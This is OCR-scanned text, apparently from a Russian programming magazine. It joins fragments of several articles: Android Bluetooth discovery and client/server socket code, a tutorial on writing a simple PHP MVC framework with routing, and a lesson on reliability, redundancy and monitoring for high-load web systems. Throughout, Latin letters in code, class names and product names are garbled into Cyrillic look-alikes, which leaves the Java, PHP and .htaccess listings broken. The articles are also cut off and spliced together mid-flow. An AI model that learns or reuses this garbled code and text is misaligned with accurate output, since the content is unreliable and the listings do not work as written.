пеы ВгоасІс азіКесеіѵегП { 

риЫіс ѴОІС І опКесеіѵеРСо піехі сопі ехі. Іпіепі іпіепі) { 
Зігіп^ асііо п = іпіепі . §еіАсі іоп ( ^ ; 

// Когда найдено устройство 

і-р ( ВІиеіооіЬРеѵісе.АСТІОМ РОІІМР.едиаІБС асііоп)) { 

// Полу чаем объект ВІиеіооіЬОеѵісе из Іпіепі 

ВІиеіооі ЬРеѵісе сіеѵісе = іпіепі. §еіРагсе1аЫеЕхіга^ 
(ВІи еіооіЬРеѵісе . ЕХТКА_РЕѴІСЕ ) ; 

// Выводим сообщение в журнал 
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Готовим приложение для АпсІгоісІ 



Іо^. ѵ( "ВІиеТооІіІі Різсоѵегѵ: ". 4-- 

сІеѵісе.§е1;Мате() + "\п" + сІеѵісе.^еІіАс ІсІгеззП ’) ; 

} 

} 



Іп1:еп1:Рі11:ег 1і11:ег = 

пеы Іп1;еп1;Рі11;ег(В1ие1:оо1;Іі0еѵісе.АСТІ0М_Р0иМ0) ; 
ге§І5І;егКесеіѵег(туКесеіѵеГд 1і11;ег); 

т у В 1ие 1:оо1:Іі . 5І:аг1:РІ5соѵ егу ( ) ; 

УСТАНОВКА СОЕДИНЕНИЯ 
С ВШЕТООТН-УСТРОЙСТВОМ 

Можно разработать как приложение-сервер, которое будет ожи- 
дать входящих запросов, так и приложение-клиент, которое будет 
устанавливать запрос с сервером. В листинге 5 приведен код, 
ожидающий соединения от программы-клиента. 

Листинг 5. Ожидание запроса на подключение от клиента _ 

// Класс Ассер1:В1ие1:оо1:ІіТІігеасІ принимает входящие запросы 

ргіѵаііе сІазБ Ассер1:В1ие1:оо1:ІіТІігеасІ ех1:епсІ5 ТІіге асІ { 

ргіѵаііе бпаі В1ие1:оо1:Іі$ егѵег$оске1: тѵ$е гѵег$оске1:: 

риЫіс АссерІіТІігеасІО 

// Используем временный объект, который позже 

// будет присвоен члену тѵ$егѵег5оске1: . поскольку 

// тѵ5егѵег5оске1: — финальный член класса и потом уже 

// не может быть изменен 

В1ие1:оо1:Іі$егѵег$оске1: Ыр = пиіі; 

Ыхі 

// МУ_ІЛЛ0 - идентификатор^ используемый клиентом 

1:тр = шАсІарІіег ЛІ5І:епи5Іп^К-Рсотт1лІі1:Іі5егѵісеКесогсІ4-» 

(МАМЕ. МУ ЦШРУ. 

} саіісіі (ІОЕхсерІііоп е) {} 

// Присваиваем 1пті р члену класса тѵ$егѵег$оске1: 

ту$егѵег$оске 1: = Шду 

} 

риЫіс ѵоісі гипП { 

В1ие1:оо1:Іі5оске1: 50ске1: = пиіі; 

// Прослушиваем соединения 

ыбііе (1:гие’) { 

^гу { // Прин имаем соединение 

50ске1: = ту$ егѵег$оске1:.ассер1:П : 

} саІісІі (ІОЕхсерІііоп е) { 

Ьгеак; 

// Если соединение было принято 

і-р (50ске1: != пиіі) I 

// Об работка с оединения в отдельном потоке 

Ро$оте1:Іііп^1лІі1:Іі(50ске1:) : 

// После обработки соединения закрываем сокет 

ту5егѵег5оске1: . сІозеП ; 

Ьгеак: 

} 

} 



риЫіс ѴОІСІ сапсеІП { // В случае отмены соединения... 

ігу { // Закрываем сокет 

ту$егѵег$оске1:.с105еП : 

> саіісЬ (ІОЕхсерііоп е) {> 

} 

} 

Теперь осталось написать приложение-клиент, устанавлива- 
ющее соединение с ВІиеІооіЬ-сокетом. Пример класса, который 
используется для установки соединения, приведен в листинге 6. 

Листинг 6. Установка соединения с ВІиеѣоо'Ыі- сокетом 

ргіѵаіе с1а55 Соппе сіТЬгеасІ ехіепсІБ ТЬгеасІ { 




Рис. 2. Информация о телефоне 

ргіѵаіе бп аі В1ие1:оо1:Ь5оск е1: тѵБоскеІ:; 

ргіѵаіе бп аі ВІиеіооІіЬРеѵі се туРеѵісе; 

риЫіс Соппес1:ТЬгеасІ(В1ие1:оо1:ЬРеѵісе сіеѵісе) { 

// Используем временный объект, который позже 

// будет присвоен члену шѵБоскеІ:. поскольку 

// шуЗоскеІ: - финальный член класса и потом уже 

// не может быть изменен 

В1ие1:оо1:Ь$оске1: ітр = пиі і; 

туРеѵісе = сіеѵісе: 

// Получаем В1ие1:оо1:Ь5оске1: для соединения 

// с ВІиеіооІіЬ Реѵісе 

Ьсу_і 

// МУЦЦІР - идентификатор, такой же ис пол ьзует 

// сервер 

ітр = сіеѵ ісе . сгеаіе К-Р соттЗоскеІіТоЗегѵісеКесог сІ^-» 

(МУ ЦЦІРѴ. 

} саісЬ (ІОЕхсерііоп е) {> 

туБоскеІ: = ітр: 

} 

риЫіс ѴОІСІ гипП { 

// Отключаем обнаружение уст ройств, поскольку оно 

// замедляет соединение 

тАсІаріег .сапсеІРІБСоѵегуП ; 

ши 

// Соединяемся с устройством через сокет 

туБоскеІ: . соппесі: ( ) ; 

} саісЬ (ІОЕхсерііоп соппесІіЕхсерІіі оп’) { 

// Нево зможно подключитьс я, закрываем сокет 

ши 

туБоскеІ: . сІозеП ; 

} саісЬ (ІО Ехсерііоп сІ озеЕхсерІііоп) {} 

геіигп: 

} 

// Соединение установлено, производим его обработку 

// в отдельном потоке 

Ро$оте1:Ьіп^1лІі1:Ь(тѵ$оске1:’) ; 

ш 

риЫіс ѴОІСІ сапсеІП I 

{ 

ту$оске1і. сІозеП : 

} саісЬ (ІОЕхсері іоп е) {} 

} 

} 

Полный код приложения ты найдешь на ОѴО. На этом все. Буду 
рад выслушать твои замечания и предложения по адресу 
сІЬзіІаЬзЙппаіІ.ги . ^ 
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РАЗБИРАЕМСЯ С ПАТТЕРНОМ ПРОЕКТИРОВАНИЯ 
МѴС И НАЧИНАЕМ РАЗРАБОТКУ 



Скажу честно: нам не дает покоя слава Уіі, 
КоИапа, Сосіеідпііег. Каждый из этих 
фреймворков имеет свои киллер-фичи, однако 
все они написаны на РНР и используют шаблон 
проектирования МосІеІ Ѵіеѵѵ СопІгоІІег. Погоди, 
так ведь мы уже знаем о них самое главное! 
Давай скорее напишем свой фреймворк! 



РАЗБИРАЕМСЯ С ТЕОРИЕЙ МУС 

Перед тем как ринуться в бой, быстренько ознакомимся с теорией 
паттерна МосІеІ Ѵіеѵѵ СопІгоІІег. Начнем с небольшого экскурса 
в историю... 

Многие ошибочно полагают, что паттерн проектирования МѴС 
появился нетакдавно и изначально стал применяться в области 
веб-разработки. На самом деле концепция МѴС была выдвинута 
и детально описана еще в 1979 году — о том, что такое веб, тогда 
никто и не знал, потому что слова веб просто не было. 

Своим рождением МѴС обязан Трюгве Реенскаугу. В то время 
он работал в компании Хегох РАРС над языком программирования 
5та11 Таік. Нетрудно догадаться, что свою первую практическую 
реализацию шаблон МѴС увидел именно для этого языка. 

Несмотря на работу, проделанную Трюгве, его концепция 
была по большому счету лишь идеей, хорошей теорией. Какой-то 
конкретики, практических примеров в ней описано не было. Даже 
первая библиотека для 5та11 ТаІк была создана другими разра- 
ботчиками. Впоследствии было выделено два вида реализации 
шаблона МѴС: 



• Активная модель. Главным выделяющимся элементом этой 
реализации стала идея полного разделения ролей модели, 
контроллера и представления. Все эти сущности не должны 
быть связаны между собой. Изменение модели никак не должно 
отразиться на контроллере или представлении, и наоборот. 

• Пассивная модель. В пассивной модели сущность «модель» 
не должна иметь способов взаимодействия с контроллером 
и представлением. По факту, под моделью здесь подразуме- 
вается структура данных. За всеми ее изменениями должен 
следить контроллер, который впоследствии должен принимать 
решение о перерисовке представления. 

ЧТО ТАКОЕ МУС И ПОЧЕМУ ИМЕННО ОНТ 

Для начала рассмотрим компоненты МѴС и определимся с их на- 
значением. Модель — сущность, отвечающая за предоставление 
доступа к данным, алгоритмы обработки и так далее. Если сказать 
проще, то именно в модель нужно помещать всю бизнес-логику 
приложения. Исходя из этого, сразу делаем вывод, что модель 
не должна ничего знать о других звеньях архитектуры МѴС — 
контроллере и представлении. Среди веб-разработчиков бытует 
заблуждение, что модель предназначена сугубо для операций 
получения и записи данных в базу. Алгоритмы обработки они выно- 
сят в контроллер. Такой подход сводит на нет всю идею МѴС. Чуть 
позже мы вернемся к этому. 

Представление — элемент концепции МѴС, отвечающий 
за представление данных. Под представлением подразумевается 
внешний вид — будь то шаблон дизайна в веб-приложении или СШ 
десктопной проги. В представлениях, или, как принято говорить 
на сленге, «вьюшках», не должно содержаться никаких алгоритмов 
обработки данных или их получения. Только отображение и ничего 
более. 
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Код нашего 
фреймворка 
ты найдешь 
на диске к журналу. 



Простейший роутинг в ЗиЫітеТехІ 



Схема архитектуры МѴС 



Контроллер — последний элемент, входящий в триаду МѴС. 

Он призван обеспечивать связь между пользователем (клиентом) 
и всей остальной системой. В контроллер поступают все пользова- 
тельские запросы, он анализирует их и определяет их дальнейшую 
судьбу. Никаких, например, алгоритмов получения данных из БД 
он содержать не может. 

Чтобы тебе было проще разобраться, взгляни на рисунок, 
иллюстрирующий схему архитектуры шаблона проектирования 
МѴС. На ней видно, что инициатором всех действий выступает 
клиент (пользователь). Он делаетзапрос к приложению (например, 
вбивает адрес сайта в адресной строке). Первым за дело берется 
контроллер. Он анализирует запрос и определяется с дальнейшим 
действием. Он может либо сразу перенаправить клиента к опре- 
деленному представлению, либо обратиться к модели, которая 
обработает данные клиента и вернет их контроллеру. Последний, 
в свою очередь, опять возьмется за определение судьбы контента, 
который увидит пользователь. 

С понятиями разобрались, теперь переходим к причинам, по- 
буждающим нас обращаться к МѴС в своих проектах. Пожалуй, 
главной причиной использования модели стала необходимость 
разделения кода и представления, или, как еще принято гово- 
рить, «отделение бизнес-логики приложения от представления». 
Действительно, проблема разделения кода и отображения встает 
перед каждым разработчиком. Если изначально об этом не заду- 
маться, то через некоторое время поддерживать такой код станет 
просто нереально. 

Не будем далеко ходить и сразу посмотрим на веб-приложения. 
Что в них чаще всего меняется? Конечно же, функционал и ди- 
зайн. Новые тренды в области дизайна, юзабилити появляются 
часто, и, чтобы приложение оставалось популярным, необходимо 
поддерживать его внешний вид в актуальном для своего времени 
состоянии. Сам понимаешь, что добиться этого, если код при- 
ложения перемешан с кодом отображения (НТМ1/С55), крайне 
проблематично. 

Тутхочется привести пример изжизни. Мне довелось работать 
над проектом, код которого был написан многими разработчиками. 
Естественно, каждый из них придерживался своего стиля — так, 
чтобы не сломалось то, что работает и сделано другими. Когда 
за проект взялся я, то мне повезло меньше всех. Мало того что 
сначала мне предстояло разобраться в коде, чтобы допилить 
функционал до нужного уровня, так еще на мои плечи возложили 
смену дизайна. Дизайнер придумал интересный и действительно 
хороший вариант, но когда я представил, сколько мне потребу- 
ется времени на чистку кода приложения, с бесконечным числом 
разбросанных 501-запросов, вставок тегов и хаков для браузера, 
я несколько раз выругался матом и решил тупо начать с полной 
переделки. Пришлось, конечно, попотеть, но, когда я привел код 



в нужный вид, смена дизайна показалась мне попсовой песней. 
Кстати, после этого дизайн приложения менялся еще два раза, 
и оба они прошли в приемлемые сроки. 

Немаловажный плюс шаблона МѴС еще и в том, что он сразу 
адаптирован для работы в команде. Разработчик, отвечающий 
за бизнес-логику, может спокойно работать над своими запросами 
и алгоритмами, а фронтенд-девелопер может в это время разраба- 
тывать новые представления. В итоге каждый занимается своим 
делом и не мешает другим. 

МАСТЕРИМ СОБСТВЕННЫЙ ФРЕЙМВОРК 

Для начала определимся с задачами и функциями будущего 
нашего проекта. А что вообще собой представляет типичный 
фреймворк? В первую очередь — это удобный каркас для нового 
приложения, созданный по канонам модели МѴС. Другой важный 
компонент абсолютно любого фреймворка — роутинг. Под роу- 
тингом подразумевается модуль, отвечающий за разбор запро- 
сов, получаемых от клиента. Ну и третьим компонентом можно 
назвать дополнительные библиотеки. В таких фреймворках, 
как Сосіеідпііег, КоЬапа, Уіі, присутствует множество дополнитель- 
ных модулей с функциями, которые могут пригодиться при разра- 
ботке веб-проекта. 

Наш демонстрационный фреймворк, разумеется, получится 
максимально простым. Мы не будем городить тонну библиотек 
(все равно не успеем), а просто реализуем МѴС-шаблон и про- 
стейший роутинг. Почему простейший? Потому что тут есть много 
различных нюансов, и про серьезный пример роутинга в Уіі можно 
написать отдельную статью. 

ОК, теперь подойдем к созданию файловой структуры нашего 
будущего фреймворка. Мой вариант представлен ниже: 

\ 

арр1іса1;іоп 

I - соп1іго11ег5 

I - соге 

I - тосіеіз 

I -ѵіеыз 

ІоасІ . рбр 
. ІтІіассеББ 
іпсіех. рбр 

В директориях сопігоііегз, ппосІеІБ, ѵіеѵѵз будут храниться поль- 
зовательские варианты контроллеров, моделей и представлений. 
Каталог соге будет содержать все системные файлы. Тут будут рас- 
полагаться наши шаблоны контроллеров, моделей и другие вспомо- 
гательные модули. Сценарий ІоасІ.рЬр будет отвечать за подключе- 
ние всех компонентов и непосредственный запуск приложения. 
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Корневая директория содержит Ыассезз-файл (в нем опреде- 
лим правила для веб-сервера) и іпсІех.рЬр. Индексный файл будет 
являться диспетчером нашего приложения. Его единственная 
задача — принять запрос (все обращения пользователя будут идти 
через этот файл) и передать эстафетную палочку загрузчику — 
Іоаб.рЬр. 

Теперь начнем постепенно заполнять наши файлы. Первым 
делом открывай файл настроек ѵѵеЬ-сервера (Ыассезз) и напиши 
в нем несколько строчек кода: 

КеыгіІіеЕп^іпе Оп 

КеыгіІіеСопсІ %{КЕ0ЦЕ5Т_РІІЕМАМЕ> ! -Р 

КеыгіІіеСопсІ %{КЕ^^Е5Т_РI^ЕNАМЕ} ! -сі 

КеыгіІіеКиІе .* іпсіех.ріір [I] 

Этим кодом мы определили, что все запросы от клиента должны 
переадресовываться сценарию іпбех.рЬр. Пока он у нас пуст, 
но сейчас мы исправим ситуацию. Открой пустышку іпбех.рЬр и на- 
пиши в ней: 

<?рІір 



іпі_зе1:( ' (Из ріау еггогз ' . 1); 

гедиіге опсе ' арр1іса1:іоп/1оасІ . рбр ' ; 

В іпбех.рЬр мы только определяем режим отображения ошибок 
и подключаем загрузчик нашего приложения. Какты помнишь, 
в Іоаб.рЬр у нас должен быть определен код для подключения всех 
остальных компонентов фреймворка, а также запуск роутинга. 

Что ж, давай сразу это и опишем: 

<?рІір 



гедиіге опсе ' соге/гои1ііп^. рбр ' ; 

_опсе ' соге/тосіеі . рбр ' : 
гедиігеопсе ' соге/ѵіеы . рбр ' ; 
гедиіге опсе ' соге/соп1:го11ег . рбр ' ; 



// Запуск роутинга 

Коиііп^: :ехеси1:е() ; 

Здесь все сводится к банальному подключению компонентов 
системы с помощью функции гедиіге_опсе. После выполнения этой 
операции нам требуется запустить наш роутинг. Для этого мы опи- 
шем одноименный класс и снабдим его единственным статическим 
методом ехесиІеО. Напомню, что именно в роутинге будет происхо- 
дить разбор ПРЕ и определение контроллера, который продолжит 
обработку запроса. Код класса роутинга приведен в листинге 1. 

Листинг 1. Исходный код класса І^оиііп§ 

<?рІір 



сіазз КоиЛп^ 

{ 

5І:а1 : ехесиіеО 

{ 

$соп1;го11егМате = 'Маіп'; 

$ас1:іопМапіе = 'іпсіех': 

$ріесезО-Риг1 = ехр1осІе( . $_5ЕКѴЕК[ 'КЕдиЕ5Т_иКІ' ]); 



(! ($ріесезО-Риг1[1] ) ) 

{ 

$сопіго11егМате = $ріесе50-Риг1[1] ; 



} 



(! ($ріесезО-Риг1[2] ) ) 



{ 

$ас1;іопМате = $ріесезО-Риг1[2] ; 

} 

$тосІе1Мате = 'МосІе1_' . $соп1;го11егМате; 
$соп1:го11егМапіе = 'Сопігоііег ' . $соп1:го11егМапіе: 

$ас1:іопМате = 'ас1:іоп_' . $ас1:іопМате: 

$1і1е1лІі1;ІіМосІе1 = з1:г1;о1оыег($тос1е1Мате) . 'ріір'; 
$1і1е1лІі1;ІіМосІе1Ра1;Іі = "арріісаіііоп/тосіеіз/" . 
$1і1е1лІі1:ІіМосІе1 ; 



і-р (б1е_ехІ5І:5($б1е1лІі1:ІіМосІе1Ра1:Іі’) ^ 

і 

іпсіисіе $1і1е1лІі1:ІіМосІе1Ра1:Іі : 

} 

$1і1е1лІі1;ІіСоп1;го11ег = з1;г1;о1оыег($соп1;го11егМате) .4-< 

' -ріір' . ; 

$б1е1лІі1іІіСоп1:го11егРа1:Іі = ■»-■ 

"арріісаііоп/сопіігоііегз/" 

$1і1е1лІі1:ІіСоп1:го11ег : 



і-р (бІ е ехізІізР^бІеІлІіІіІіСопІігоІІегРаІіІі) ) 

{ 

іпсіисіе $Р і1е1лІі1:ІіСоп1:го11егРа1:Іі ; 

і 

еізе 

і 

// Здесь нужно добавить обработ ку ошибки. 

// Например, перекинуть пользователя на страницу 404 

} 



$соп1іго11ег = пеы $соп1іго11егМапіе: 
Іасііоп = $асі:іопМате; 



і-р (те1:ІіосІ_ехІ5І:5($соп1:го 11ег . $ас 1:іоп) ) 

{ 

са11_изег_-Рипс(аггау($соп1:го11ег . $ас1:іоп_папіе’) . ^ 

$ріесезО-Риг1) ; 

} 

еізе 

{ 

// Зде сь тоже ну жно добавить обработку ошиб ок 

} 

} 

} 

В первом листинге приведен код класса, реализующего про- 
стейший роутинг. Простейшим он получился потому, что в нем 
не поддерживается обработка дополнительных параметров (под- 
держивается, но некрасиво) и напрочь отсутствуют какие-либо 
проверки, обеспечивающие безопасность кода. Эту часть кода 
я возлагаю на твои плечи, так как в рамках одной статьи расска- 
зать все просто невозможно. 

Теперь разберем код первого листинга. Для начала нам тре- 
буется определить контроллер и метод, которые будут вызваны 
по умолчанию. Например, если пользователь хочет зайти на наш 
ресурс, то не нужно заставлять его писать в адресной строке что- 
то вроде Ьир://оигзіІе.сот/ппаіп/іпсІех. В качестве контроллера 
по умолчанию мы определим Маіп, а методом у нас будет іпсіех. 
Обрати внимание: все эти значения прописаны жестко в коде. 

В реальном приложении их лучше вынести в отдельный конфигу- 
рационный файл. 

Определив контроллер и метод по умолчанию, мы можем при- 
ступать к анализу ОРІ, по которому хочет пройти пользователь. 

Для этого соберем все части ОРІ в массив и начнем анализиро- 
вать. Договоримся, что первым параметром (сразу после слеша) 
у нас будет имя контроллера, а вторым — его метод, который 
необходимо исполнить. Например, если пользователь ввел в ка- 
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честве ІІРІ Ьир://оиг5ІІе.сот/5Ьор/Ьиу, то мы должны обратиться 
к контроллеру с именем зЬор и вызвать его метод Ьиу. Если такой 
контроллер отсутствует, то нужно сгенерировать ошибку 404. 

Для экономии места я не стал приводить код ее отображения, 
его ты сможешь увидеть в исходниках, прилагаемых к статье. 

Представим, что с контроллером мы определились. Теперь 
самое время задуматься о модели. Ты же помнишь, контроллеру 
для осуществления своей работы может потребоваться модель, 
а раз так, то нужно ее подключить. Чтобы знать, какую модель тре- 
буется инклудить (их может быть несколько), условимся заранее, 
что имя файла с моделью должно соответствовать шаблону: Мос1е1_ 
ИмяКонтроллера. Таким образом, каждый контроллер нашего 
фреймворка может иметь одну модель, что более чем достаточно 
для реального приложения. Файл с моделью подключается точно 
таким же образом, как и файл с контроллером. 

После успешного подключения необходимых файлов нам требу- 
ется сделать еще одну проверку. Файл с контроллером мы нашли, 
а где гарантии, что у него есть соответствующий метод? Если его 
нет, то нужно прерывать дальнейшие действия и генерировать 
страницу с кодом ошибки 404. Для определения наличия метода 
в РНР есть функция теіЬосІ_ехІ5І5. Первым параметром переда- 
ется класс, а вторым — имя метода, наличие которого требуется 
проверить. Если функция выполняется успешно, то можно вы- 
зывать нужный метод контроллера. Для этого применяем функцию 
са11_и5ег_1'ипс(). 

Все, на этом с разбором роутинга покончено, и можно пере- 
ходить к рассмотрению базовых классов, описывающих заготовки 
для моделей, контроллеров и представлений. Их код приведен 
в листингах 2, 3 и 4. 

Листинг 2. Код класса СогтЬгоІІег 

<?рІір 



сІазБ Сопіігоііег { 
риЫіс $тосІе1: 

риЫіс $ѵіеѵ\/: 

-Рипсіііоп соп1ігис1:( ) 

{ 

-> ѵіеы = пеы ѴіеыП: 

} 



-Рипсіііоп асІііоп іпсІехП 

{ ■■■ } 

} 

Листи нг 3. Код класса Мосіеі 

<? р Іір 



сІазБ Мосіеі 

{ 

риЫ іс -I» Г 1 §е1і() { } 

} 



<?рІір 



сіазз Ѵіеы 

і 



-Рипсііоп ^епега1іе($соп1:еп1:. $1іетр1а1:е. $сіа1:а = пиіі) 

{ 

іпсіисіе ' ар ріісаііоп/ѵіеыз/ ' .іешріаііе; 

} 

} 

Как видишь, код листингов практически пуст и содержит только 
базовое определение классов и методов. Исключение составляет 
разве что класс Ѵіеѵѵ. В нем определен метод депегаІеО, в котором 
происходит подключение файла с шаблоном представления. Весь 
остальной код будет описан в пользовательских реализациях 
контроллеров, моделей и представлений. 

ТЕСТИРУЕМ ФРЕЙМВОРК 

Все! Наш простейший фреймворк можно считать готовым. 

Да, получилось максимально просто, но он работает, и в этом 
ты убедишься через несколько минут. Для тестирования новоис- 
печенного продукта я подготовил небольшой пример: взял одну 
из бесплатных тем оформления и преобразовал ее к виду пред- 
ставления. Далее я определил один контроллер и в методе іпсіех 
описал вызов представления: 

$1іІіІ5 -> ѵіеы -> §епега1іе( 'шуѵіеы' ^ Чешріаііе.ріір' ) ; 

Результат работы приложения ты можешь увидеть на соот- 
ветствующих рисунках, а полный код демонстрационного проекта 
ждет тебя на диске к статье. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Создать свой фреймворк — не такая уж и сложная задача. При- 
веденный в этой статье пример — лишнее тому подтверждение. 

Да, описанный вариант фреймворка достаточно прост и мало- 
функционален. Однако тебе ничто не мешает самостоятельно 
доработать функционал и сделать из него полноценный продукт, 
который не стыдно будет представить на паблик. Все в твоих руках! 
Мне же остается только пожелать удачи и попрощаться. Как обыч- 
но, свои вопросы можешь присылать мне на почту. ^ 
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АКАДЕМИЯ 



Каждый программ ист хочет стать лучшим, 
получать все более интересные и сложные 
задачи и решать их все более эффективными 
способами. В мире интернет-разработок 
к та КИМ задачам можно отнести те, 
с которыми сталкиваются разработчики 
высокона груженных систем. 



УРОК» 



УЧЕБНИК 
ПО ВЫСОКИМ 
НАГРУЗКАМ 



Большая часть информации, 
опубликованная потеме высоких 
нагрузок в интернете, представляет 
собой всего лишь описания 
технических характеристик крупных 
систем. Мы же попробуем изложить 
принципы, по которым строятся 
архитектуры самых передовых 
и самых посеідаемых интернет- 
проектов нашего времени. 
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ЕПЛОИ И МОНИТОРИНГ 



в последнийурокмы решили добавить все, что неуспели рас- 
смотреть в предыдущих. Также здесь мы систематизируем 
основные изученные паттерны проектирования. Крометого, 
остался последний пунктнашей обязательной программы — 
это эксплуатация. Мало разработать систему, нужно еще и под- 
держивать, а это целое искусство. 

Как уже неоднократно говорилось, первое и главное отличие 
в ысокона груженного проекта заключается в сложности и на- 
личии большого числа взаимосвязанных компонентов. Ключевое 
слово, на которое нужно сделать ударение, — большого. 

Представь себе поисковый кластер Яндекса или хранение 
фотографий «ВКонтакте» — там используются тысячи машин. 
Серверный диск, при его активном использовании, в среднем 
выходитиз строя раз в два года. Это означает, что изтрехтысяч 
серверов прямо сегодня полетят диски у четырех машин. Вывод — 
в большой крупной системе всегда что-то не работает, какой-то 
из серверов вышел из строя, какой-то из дисков сбоит. И это — 
нормальное состояние системы. Ты должен быть к нему готов, 
и мы в этой статье расскажем как. 

НАДЕЖНОСТЬ 

Надежность веб-системы (как и любой другой системы) за- 
ключается в способности сохранять в пре дел ах уста нов лен ной 
нормы значения всех параметров, характеризующих способность 
выполнятьтребуемые функции. В нашем случае — обрабатывать 
запросы пользователей. 

Взависимости отситуации параметры установленной нормы 
можно определять по-разному. Конечно, хорошо, если сайтотве- 
титна запрос за од ну десятую секунды, но, если он ответит на за- 
прос за две секунды, ничего критичного не произойдет. С этим 
связан один из способов борьбы с резко возросшей нагрузкой, 
который называется деградация функциональности. В любом 
проектеестьфункции, почти незаметные пользователю, нотре- 
бующие для своей реализации серьезных серверных ресурсов. 

Например, скорость появления на сайте опубликованной ре- 
дактором новости. Если это не новостное издание, то пострадает 
ли пользователь оттого, что новость ста нет доступ на только че- 
рез десять минут после публикации? Нет, не пострадает, он даже 
этого не заметит. Но разработчикам это позволит внедрить кеши- 
рование или п регенерацию. 

Возьмем в качестве примера онлайн-конструктор сайтов 
Ве^ир.ги, разработанный в нашей компании. Созданный поль- 
зователем сайт не начнет работать, пока тот не нажмет кнопку 
«Опубликовать». Этозвучитпросто, нотакое искусственное 
препятствие позволило значительно снизить нагрузку на систе- 
му, поддерживающуюЗббтысяч пользовательских сайтов всего 
на несколькихсерверах. 

Подробно о деградации функциональности мы рассказы- 
вали в четвертомуроке, а сейчас вернемся к надежности. Одно 
дело — допустимое снижение скорости работы нашей системы, 
но как избегать проблем со скоростью во всех других случаях? 

Как избегать за медлен ИЙ вне зависимости оттого, какие диски 
полетели и куда? 

ИЗБЫТОЧНОСТЬ И ДУБЛИРОВАНИЕ 

Способ ровно один: если ты хочешь быть готовым к выходу 
из строя некоторыхэлементов — вводи избыточностьэтих самых 
элементов. Это, к сожалению, неизбежно. Если хочешь, чтобы 
фронтенд всегда был на связи — ставь два, если хочешь надеж- 
ности в работе базы данных — настраивай репликацию. 



Принципы надежности 

• Взаимозаменяемость серверов; 

• Избыточность данных, дублирование узлов: 

-фронтенд: ОМ5-балансировка, САРР, 
беагіЬеаІ; 

-бэкенд: гомогенные взаимозаменяемые 
бэкенды; 

-базы данных: дублирование данных, 
репликации, кластеры 



Это как С денормализацией 
из прошлого урока — хранение 
дублированных да иных, оптими- 
зированных для выборок, — да, 
придется хранить одни и те же эле- 
менты в несколькихэкземплярах, 
зато быстро работает. Это неизбеж- 
ное зло. Чтобы понять, что именно 
дублировать, нужно смоделировать 
проблемное состояние и заранее 
просчитатьего. 

Диск может выйти из строя? Зна- 
чит, надо хранить да иные не в од- 
ном экземпляре, а в нескольких. 

И обновлять в реальном времени: 
закачивая файл на один из серве- 
ров в паре, сразу же закачивать 
и на другой. Пока файл не появится 
на обоих серверах, операция счита- 
ется невыполненной. 

Сервер бэкенда можетсгореть? 
Пустьсерверовбудетна один боль- 
ше. Или на несколько штукбольше, 
чтобы не вызвать цепную реакцию 
и не столкнуться с проблемой шква- 
ла/антишквала (смотри предыду- 
щиеуроки). 

Можетумеретьчто-то на машине 
с базой данных? Настрой реплика- 
цию, и пусть слейв всегда стоитпод 
парами, готовый принять нагрузку. 
Должно ли программное обеспе- 
чение самостоятельно принимать 
решениео переключении на другой 
сервер базы данных? Это на самом 
деле совсем не простой вопрос. По- 
тому что все экземпляры, допустим, 
бэкенда, должны одновременно 
принять решение о переключении 
на новый сервер базы данных. 

И что делать, если старый сервер 



базы данных восстановится? Часть 
бэкендовуйдетна старый сервер, 
часть на новый, и гарантирован- 
но появится огромная проблема 
с целостностью данных. 

Поэтому автоматическое пере- 
ключение на реплику используется 
редко. Обычно на репликупере- 
ключаюттолько чтение из базы 
данных, одновременно отключая 
(деградация функциональности, 
это тоже она) запись в базу да иных. 

И естественно, всеэтосопрово- 
ждается взводом красныхфлажков 
в системе мониторинга. Впрочем, 
о системе мониторинга позже. 

ПРИНЦИПЫ НАДЕЖНОСТИ 

Мы уже упоминали в прошлых уро- 
ках все основные способы введения 
избыточности, поэтому просто 
перечислим их: 

• дляфронтендаэтобалансировка 
или составление пар серверов, 

в которыходин всегдазапасной. 
Запасной сервер включает- 
ся только в том случае, если 
ведущий перестал откликаться 
и обрабатыватьзапросы; 

• для бэкенда это гомогенные 
взаимозаменяемые бэкенды, от- 
сутствиеточекотказа (принцип 
зИагесІ по1;Ыпд), отсутствие из- 
менения состояния бэкенда по- 
сле обработки запроса (принцип 
з^аіеіезз); 

• для базданныхэто денормали- 
зация, репликации, кластеры. 
Для би парных да иных это 
резервирование и дублирование 
информации. 
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АКАДЕМИЯ 



от АВТОРОВ 

Основным направлением деятельности нашей компании является 
решение проблем, связанныхс высокой нагрузкой, консультирование, 
проектирование масштабируемыхархитектур, проведение нагрузочных 
тестирований и оптимизация сайтов. В число наших клиентов входят 
инвесторы из России и со всего мира, а также проекты «ВКонтакте», 
«Эльдорадо», «Имхонет», РЬоІозідЫ.ги и другие. Во время консультаций 
мы часто сталкиваемся стем, что многие не знают самых основ — что 
такое масштабирование и каким оно бывает, какие инструменты и для 
чего используются. Эта публикация завершает серию статей «Учебник по 
высоким нагрузкам». В этих статьях мы постарались последовательно 
рассказать обо всех инструментах, которые используются при построе- 
нии архитектуры высоконагруженныхсистем. 



Как в программном обеспечении ты избегаешь единых 
точек отказа, точно так же надо избегать точек отказа и в же- 
лезе. Старайся не использовать никакого уникального обо- 
рудования без крайней на то нужды. Ты удивишься, но поиск 
Яндекса, обрабатывающий десятки тысяч запросов в секунду 
и хранящий колоссальное количество информации, построен 
на самых обычных серверах. И вот почему: 

• легко и просто достигается взаимозаменяемость компонентов; 

• закупка новых серверов и комплектующих не представляет 
проблемы — тебе не нужно полгода ждать из США какую-то 
уникальнуюдеталь. 



СНА05 МОНКЕУ 

Говоря о надежности и отказоустойчивости, не можем неупомянуть 
один из самых интересных способов тестирован ИЯ. Как проверить, 
продолжит л и наша система работать при выходе из строя отдел ь- 
ныхсерверов или компонентов? 

Инженеры компании Ме^Ііх придумали инструмент и на- 
звали его СЬаоз Мопкеу. Работа обезьянки Хаоса состоит в том, 
чтобы хаотично прибивать случайный сервис или процесс 
на каком-то случайно выбранном сервере программной систе- 
мы. Весь проект при этом должен продолжать работать, какой 
бы конкретно процесс ни убила СЬаоз Мопкеу. Системные адми- 
нистраторы оценят простоту и элегантность решения — скрипт 
на пару строк, вызывающий «кіІІ -9» для случайного процесса. 

МОНИТОРИНГ 



появления новыхданных 
на реплике, время выполнения 
отдельных операций в базе 
данных. То есть технические 
параметры, которые описывают 
работу именнотвоего проекта, 
учитывая его специфику и функ- 
циональность. 

Мониторинг бизнес-параме- 
тров даст возможность отсле- 
живать изменения в поведении 
пользователей и реагировать 
на них. Например, ссылка с глав- 
ной страницы Яндекса вызовет 
огромный приток регистраций, 
ты отслеживаешь этот процесс 
и своевременно начинаешь под- 
